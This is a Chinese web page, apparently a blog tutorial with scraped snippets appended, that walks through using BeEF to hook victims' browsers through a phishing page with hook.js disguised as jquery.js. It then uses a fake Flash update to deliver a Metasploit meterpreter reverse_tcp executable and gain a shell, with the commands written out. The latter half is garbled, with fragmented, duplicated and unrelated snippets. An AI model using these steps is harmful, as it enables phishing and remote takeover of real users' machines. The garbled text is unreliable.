BeEf 简介
BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。
BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。
最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。
apt install beef-xss
安装完成后,直接执行 “beef-xss” 命令即可,首次启动需要设置密码再行登录。
之后便会弹出 BeEf 的登录页面
输入用户名口令即可登录
启动 apache2 服务,这样受害者就可以访问钓鱼页面
service apache2 start
接下来我们要准备 hook.js 文件,用来嵌入到钓鱼页面
首先,先将 BeEf 的配置文件 /etc/beef-xss/config.yaml 中的 host 地址修改为对外的 IP 地址,这里修改为攻击机的 IP :192.168.15.133
然后下载 hook.js 文件放到钓鱼页面目录下,并命名为 jquery.js
wget http://192.168.15.133:3000/hook.js -O /var/www/html/jquery.js
将其嵌入到钓鱼页面
在钓鱼页面加入 <script> 标签
受害者访问钓鱼页面:
再看攻击机,BeEf 已经可以对受害者浏览器进行控制:
可以尝试假装需要 Flash 更新来欺骗受害者运行钓鱼木马程序
准备好木马程序(使用 metasploit )
msfconsole
# 启动 metasploit
handler -H 192.168.15.133 -P 4444 -p windows/meterpreter/reverse_tcp
# 持续监听
# -H 攻击机主机IP
# -P 监听端口
# -p 监听payload
use payload/windows/meterpreter/reverse_tcp
# 使用模块
options
# 查看模块所需选项,Required的值为yes即为必填项
# LHOST为本地IP,即为攻击机IP
# LPORT为本地端口
generate -f exe -o /var/www/html/FlashUpdate.exe
# 生成木马程序,并放到钓鱼页面目录下
准备好木马程序后,在 BeEf 的 Commands 模块下执行命令
依次进入 Social Engineering -> Fake Flash Update
设置好相应的值,点击右下角的 Execute 执行
受害者访问的钓鱼页面已经弹出更新Flash的提示
点击图片即可下载木马程序
待受害者执行该程序时,msf 终端即可弹出提示,此时攻击机已经获得会话:
使用 “sessions” 命令查看生成的session:
现在就可以getshell了
BeEf 简介BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。apt install beef-xss安装完成后,直接
BeEF
的 Dockerfile(浏览器开发框架)
拉取存储库docker pull malwarelu/
beef
启动
BeEF
docker docker run malwarelu/
beef
正在运行的容器上的 TCP/3000 上可用的服务
雷利比牛肉
raylib-
beef
是Raylib 3.1 dev的
Beef
包装器库,这是一个简单易用的库。 结合
Beef
编程语言的优势,制作游戏绝对令人满足!
注意力! 这种绑定仍在开发中。 可能会发生错误。 二进制文件已从存储库中删除。 您可以从“下载包含二进制文件的库!
raylib.h
raymath.h
rlgl.h(部分)
Physac.h-警告! 符号不包含在已发布的二进制文件中!
文本操作方法没有绑定牛肉已经具有用于文本处理的自定义方法
rlgl绑定已部分完成
库是使用/ MT标志静态编译的
绑定其他头文件: raygui.h
将示例重写为
Beef
对raylib-
beef
(RayApp)(??)
进行
更高的抽象
快速入门(使用
Beef
IDE)
下载raylib-
beef
并将其复制到以下位置: C:\ Progra
root@kali:~# vim /etc/
beef
-xss/config.yaml
在这里可以看到
beef
的默认用户名和密码,也可以
进行
修改,我这里对默认的密码
进行
了修改
注:(默认
beef
用户名和密码位User:
beef
,Password:
beef
)
3、启动
Beef
root@kali:~#
beef
-xss
BEEF
(The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS
漏洞
的攻击和
利用
。
BeEF
主要是往网页中插入一段名为hook.js的JS
脚本
代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段...
beef
beef
概念
beef
的安装
beef
的使用
beef
的实战
beef
概念
一、
BeEF
,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS
漏洞
的攻击和
利用
。
BeEF
主要是往网页中插入一段名为hook.js的JS
脚本
代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向B
近日,深信服终端安全研究团队中捕获到了一个木马程序,攻击者通过网络
钓鱼
的手段诱导受害者点击运行邮件中附带的木马程序,结合正常的Adobe CEF Helper程序
进行
攻击;在局域网内通过共享目录
进行
传播,并在用户主机上留下后门程序
进行
窃密或者其他恶意行为。
从受害主机上的情况来看,病毒主要有三个部分构成:
BeeF
是前欧美最流行的web框架攻击平台,kali 集成
Beef
,而且
Beef
有很多好使的payload。例如,通过XSS这个简单的
漏洞
,
BeeF
可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,
beef
属于c/s结构,具体看图
zombie(僵尸)即受害的浏览器。zombie是被hook(勾
文章目录一:ShellCode1.1:简述1.2:调用shellcode的四种方式1.2.1:远程调用JS1.2.2:windows.location.hash1.2.3:xss Downloader1.2.4:备选存储技术二:XSS的防御2.1:使用XSS Filter输入过滤输入验证数据消毒输出编码黑白名单2.2:防御DOM-XSS三:XSS实战实验3.1:
beef
简介3.2:
beef
的简单准备3.3:浏览器劫持
一:ShellCode
1.1:简述
shellcode就是在
利用
漏洞
所执行的代码。
This lesson is an example of how a website might support a phishing attack
Below is an example of a standard search feature.
Using XSS and HTML insertion, your goal is to:
Insert html to that req...
BeEF
(Browser Exploitation Framework)是一个开源的浏览器
漏洞
利用
框架,可用于对Web应用程序
进行
攻击。下面是
BeEF
的8种攻击方法:
1. XSS攻击:通过XSS
漏洞
注入恶意
脚本
来控制用户的浏览器。
2. CSRF攻击:通过伪造请求来
利用
用户已经登录的状态,从而执行一些危险操作。
3. Clickjacking攻击:通过伪造用户界面,诱使用户点击一些看似无害的按钮,从而执行一些危险操作。
4. Social Engineering攻击:通过欺骗用户来获取用户的敏感信息,例如密码、个人信息等。
5. DNS Spoofing攻击:通过欺骗DNS服务器来修改目标网站的IP地址,从而实现中间人攻击。
6. Man-in-the-Middle攻击:在用户与目标网站之间插入一个恶意的代理服务器,以便拦截、修改或篡改通信数据。
7. Session Hijacking攻击:通过窃取用户的会话ID来冒充用户,访问受保护的资源。
8. Remote Code Execution攻击:
利用
漏洞
来执行远程命令,例如上传恶意
脚本
或执行系统命令。
